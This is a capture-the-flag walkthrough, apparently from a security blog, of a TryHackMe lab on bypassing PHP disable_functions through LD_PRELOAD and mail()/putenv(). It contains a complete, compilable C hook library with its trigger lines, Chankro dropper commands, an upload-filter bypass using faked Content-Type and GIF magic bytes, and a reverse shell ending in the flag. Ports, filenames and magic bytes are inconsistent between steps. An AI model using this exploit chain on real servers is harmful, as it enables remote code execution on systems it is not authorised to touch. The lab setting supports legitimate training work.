Bypass Disable Functions
Practice bypassing disabled dangerous features that run operating system
commands or start processes.
This vulnerability occurs in web applications that let a user upload a file without any security control checking it for potential dangers.
It allows an attacker to upload files containing code (scripts such as .php, .aspx and others) and run them on the same server; more information in this room.
Among the measures typically applied is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through the disable_functions directive in the php.ini configuration file. Less well-known functions, such as dl() (which loads a PHP extension dynamically), can go unnoticed by the system administrator and stay enabled. The usual thing in an intrusion test is to list which functions are still enabled, in case any have been forgotten.
One of the easiest techniques to implement, and not a very widespread one, is to abuse the mail() and putenv() functions. The technique is not new: it was reported to PHP in 2008 by gat3way, but it still works to this day. With putenv() we can modify the environment variables of the PHP process, which lets us set the LD_PRELOAD variable to whatever we want. Roughly speaking, LD_PRELOAD makes the dynamic loader load a .so library of our choice before the rest of the libraries, so that when a program calls a function from a library (libc.so, for example) it runs the one in our library instead of the one it should. In this way we can hijack or "hook" functions and modify their behaviour at will.
The missing piece is a new process for the loader to act on: mail() spawns the sendmail binary configured in sendmail_path, that child inherits the environment we just modified, and so our library is loaded into it. Two conditions have to hold for this to work: mail() and putenv() themselves must not be in disable_functions, and sendmail_path must point to an existing binary (with no MTA installed, mail() spawns nothing). Note also that the loader ignores a full-path LD_PRELOAD for setuid or setgid binaries, so a setuid sendmail wrapper will not load the library.
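To make the mechanism concrete, here is an added example of the kind of library the technique relies on, written for this page rather than taken from Chankro or from the original article. It assumes the PHP side sets two variables before calling mail(): `putenv("LD_PRELOAD=/var/www/html/uploads/hijack.so")` (the path is an assumption) and `putenv("HIJACK_CMD=/bin/bash /var/www/html/uploads/c.sh")` (HIJACK_CMD is a name invented for this example; Chankro's generated code has its own layout). Build it with `gcc -shared -fPIC -o hijack.so hijack.c`.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Remove LD_PRELOAD from this process's environment so that the shell we
 * spawn, the payload and anything the payload starts do not load this
 * library again (every child would otherwise re-run the constructor and
 * the host ends up fork-bombed). Returns 0 when the variable is gone. */
int drop_preload(void)
{
    if (getenv("LD_PRELOAD") == NULL)
        return 0;
    if (unsetenv("LD_PRELOAD") != 0)
        return -1;
    return getenv("LD_PRELOAD") == NULL ? 0 : -1;
}

/* Run a shell command line in a child process and return its exit status,
 * or -1 if it could not be spawned or was killed by a signal. We fork
 * instead of exec'ing in place so that sendmail carries on and mail()
 * returns normally to the PHP script; a long-lived payload (a reverse
 * shell) should therefore background itself inside the script. */
int run_payload(const char *cmdline)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child: do not inherit sendmail's stdin pipe (the mail body). */
        int devnull = open("/dev/null", O_RDWR);
        if (devnull >= 0) {
            dup2(devnull, STDIN_FILENO);
            if (devnull > STDERR_FILENO)
                close(devnull);
        }
        execl("/bin/sh", "sh", "-c", cmdline, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Entry point: the loader runs this as soon as it maps the library into a
 * process started with LD_PRELOAD pointing here (sendmail, in our case).
 * HIJACK_CMD is a variable name chosen for this example; the PHP dropper
 * sets it with putenv() next to LD_PRELOAD. If it is absent we do nothing,
 * so the library stays inert anywhere we did not intend it to fire. */
__attribute__((constructor))
static void hijack(void)
{
    const char *cmd = getenv("HIJACK_CMD");
    if (cmd == NULL || *cmd == '\0')
        return;
    char *copy = strdup(cmd);          /* unsetenv may reshuffle environ */
    if (copy == NULL)
        return;
    drop_preload();
    unsetenv("HIJACK_CMD");            /* do not re-trigger in grandchildren */
    run_payload(copy);
    free(copy);
}
```

The unsetenv of LD_PRELOAD before spawning anything is the detail that matters in practice: without it, every process the payload starts also loads the library and re-runs the constructor. A full trigger, assuming the same paths, is the two putenv() lines above followed by `mail('a@b.c', 'x', 'y');`; the recipient and body are irrelevant because only the exec of sendmail matters.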
Chankro: tool to evade disable_functions and open_basedir
Through Chankro we generate a PHP script that acts as a dropper: it writes to the server a .so library and the binary (a meterpreter, for example) or bash script (a reverse shell, for example) that we want to run freely, and then calls putenv() and mail() to launch the process.
Install tool:
git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help
python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html
--arch = architecture of the victim system, 32 or 64.
--input = file with the payload you want to execute.
--output = name of the PHP file to create; this is the file you will need to upload.
--path = the absolute path where the uploaded PHP file will be located on the server. For example, if the file is placed in the uploads folder, DOCUMENTROOT + uploads.
Now, when the PHP script is executed on the web server, the files needed to run our payload are created.
My command ran successfully, and it created a file in the directory with the output of the command.
First of all, we start the machine of the TryHackMe room Bypass Disable Functions and, after finding the room's IP, we look at what is there: an upload page where we can upload any image. To upload an executable file we have to go through Burp Suite, because the PHP file has to bypass the upload check.
After uploading the malicious file we have to find out which directory the file is uploaded to, so we use gobuster to find the directory.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.162/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/]
/cv.php               (Status: 200) [Size: 4153]
Progress: 98580 / 441122 (22.35%)
If you want to check which ports are open on this host, you can do it with Nmap or RustScan.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
|   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
|   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$
We have found the upload directory: /uploads.
Listing the site with the tool Wappalyzer shows that the application is written in PHP.
With this in mind, we can see that the file phpinfo.php is available; it gives us information about the server configuration and the settings used to interpret PHP.
Looking at the information phpinfo gives us, we can see a section called disable_functions, in which many critical functions are listed, such as:
exec
passthru
shell_exec
system
proc_open
popen
curl_exec
curl_multi_exec
As we can see, we are very limited when it comes to uploading a PHP file that contains code for our benefit, but, investigating and thanks to the information this machine provides, we can make use of the tool Chankro.
This tool lets us execute commands through the mail() and putenv() functions by changing an environment variable so that the sendmail binary spawned by mail() loads our library. A low-level explanation of what it does is given in this article. Note that neither mail nor putenv appears in the disable_functions list above, which is exactly what the technique requires.
To test whether the tool works, we will execute a whoami and write its output into the absolute path of the web root, /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/. We know this path because phpinfo shows where the site is hosted.
I will use Chankro with the following parameters, but first we create the c.sh file with the payload (a whoami whose output is written to a file in the web root):
sudo nano c.sh
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads

-=[ Chankro ]=-
-={ @TheXC3LL }=-

[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php
[+] File created!

┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$
Once Chankro has created the malicious PHP file, I go to the web page and upload it.
At upload time we intercept the request in Burp Suite, change the Content-Type to image/jpeg and prepend GIF87a to the file body.
What is GIF87a?
GIF87a is the original format for indexed colour images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animation capabilities. What matters here is that the six ASCII bytes GIF87a or GIF89a are the GIF file signature, so an upload filter that only checks the declared Content-Type and the magic bytes accepts the file, while PHP simply prints those leading bytes as output and executes the code that follows them.
Check whether the file was uploaded by looking in the /uploads directory.
Gaining Access
Now that we have confirmed that commands can be executed at the system level, I modify the file command.sh and add code that, when executed, starts a reverse shell to my machine on port 443.
With command.sh modified, I recreate the PHP file winsad.php with Chankro, add the 'GIF89a;' header once it is created, and upload the file.
Having uploaded the PHP again, I browse to the path where winsad.php is hosted; the code is interpreted and I get the shell:
Start a netcat listener (on the same port the payload connects back to) and then open the uploaded file:
nc -nvlp 4444
Once inside the machine we can go to the user's directory s4vi and view the
flag.
www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
cd /home
www-data@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
cd s4vi
www-data@ubuntu:/home/s4vi$ ls -la
ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$ cat flag.txt
cat cat flag.txt
cat: cat: No such file or directory
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/home/s4vi$
We got it!!!
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other free vulnerable resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers.
Hacking Truth is against misuse of this information and we strongly advise against it. Please read the word hacking as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.
- Hacking Truth by Kumar Atul Jaiswal